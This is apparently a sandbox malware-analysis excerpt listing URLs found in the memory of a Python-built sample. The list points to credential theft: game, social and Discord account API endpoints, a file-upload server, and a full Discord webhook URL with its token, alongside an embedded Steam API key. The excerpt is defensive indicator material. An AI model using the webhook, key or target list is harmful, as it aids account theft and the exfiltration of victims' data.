00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664664141.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660274517.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664424670.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660916713.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: rename_me_before.exe, 00000001.00000002.1977466088.000001B100D40000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
            Source: rename_me_before.exe, 00000001.00000002.1977564898.000001B100E40000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
            Source: rename_me_before.exe, 00000001.00000002.1977466088.000001B100D40000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
            Source: svchost.exe, 0000002A.00000003.1749773200.000001D218C18000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: edb.log.42.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: qmgr.db.42.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.42.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 0000002A.00000003.1749773200.000001D218C18000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 0000002A.00000003.1749773200.000001D218C18000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 0000002A.00000003.1749773200.000001D218C4D000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: qmgr.db.42.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: rename_me_before.exe, 00000001.00000003.1967359730.000001B100BB9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100BB4000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100BB9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977030207.000001B100BB9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1954269002.000001B100BB9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964950200.000001B100BB9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://httpbin.org/post
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json
            Source: powershell.exe, 00000045.00000002.1843174125.000001DBCF1C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1826414031.000001DBC0974000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664664141.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660274517.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664424670.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660916713.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A29F000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A29F000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664664141.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660274517.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664424670.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660916713.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
            Source: powershell.exe, 00000045.00000002.1826414031.000001DBBF244000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: rename_me_before.exe, 00000001.00000002.1977757597.000001B101040000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://python.org
            Source: rename_me_before.exe, 00000001.00000003.1679902734.000001B100B47000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1963524951.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1967857671.000001B100A7E000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971346591.000001B100B51000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1976903040.000001B100B52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://python.org/
            Source: rename_me_before.exe, 00000001.00000002.1977757597.000001B101040000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://python.org:80
            Source: powershell.exe, 00000045.00000002.1826414031.000001DBBF011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000045.00000002.1826414031.000001DBC06A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000045.00000002.1826414031.000001DBBF244000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: rename_me_before.exe, 00000001.00000003.1673393839.000001B100980000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664664141.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660274517.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664424670.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660916713.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
            Source: rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975466340.000001B1005E9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
            Source: rename_me_before.exe, 00000001.00000003.1673393839.000001B100980000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
            Source: rename_me_before.exe, 00000001.00000003.1673393839.000001B100980000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://account.riotgames.com/api/account/v1/user
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://account.riotgames.com/api/account/v1/user0
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://accounts.reddit.com/api/access_token
            Source: powershell.exe, 00000045.00000002.1826414031.000001DBBF011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.gofile.io/getServer
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
            Source: rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978027683.000001B101370000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bugs.python.org/issue37179
            Source: rename_me_before.exe, 00000001.00000002.1980252152.000001B102F50000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1963149161.000001B102173000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://canary.discord.com/api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com/avatars/
            Source: powershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr | String found in binary or memory: https://cryptography.io
            Source: METADATA0.0.dr | String found in binary or memory: https://cryptography.io/
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr | String found in binary or memory: https://cryptography.io/en/latest/changelog/
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr | String found in binary or memory: https://cryptography.io/en/latest/installation/
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr | String found in binary or memory: https://cryptography.io/en/latest/security/
            Source: rename_me_before.exe, 00000001.00000002.1978027683.000001B101370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc5246#section-7.4.1.4.1
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v8/users/
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
            Source: rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975466340.000001B1005E9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
            Source: rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/asyncio-eventloop.html
            Source: rename_me_before.exe, 00000001.00000003.1970570414.000001B100618000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971203694.000001B10061B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1675049880.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975666963.000001B10061C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1677223508.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1673647231.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1671664245.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670798799.000001B100615000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977938973.000001B101240000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/ssl.html#ssl.OP_NO_COMPRESSION
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://filepreviews.io/
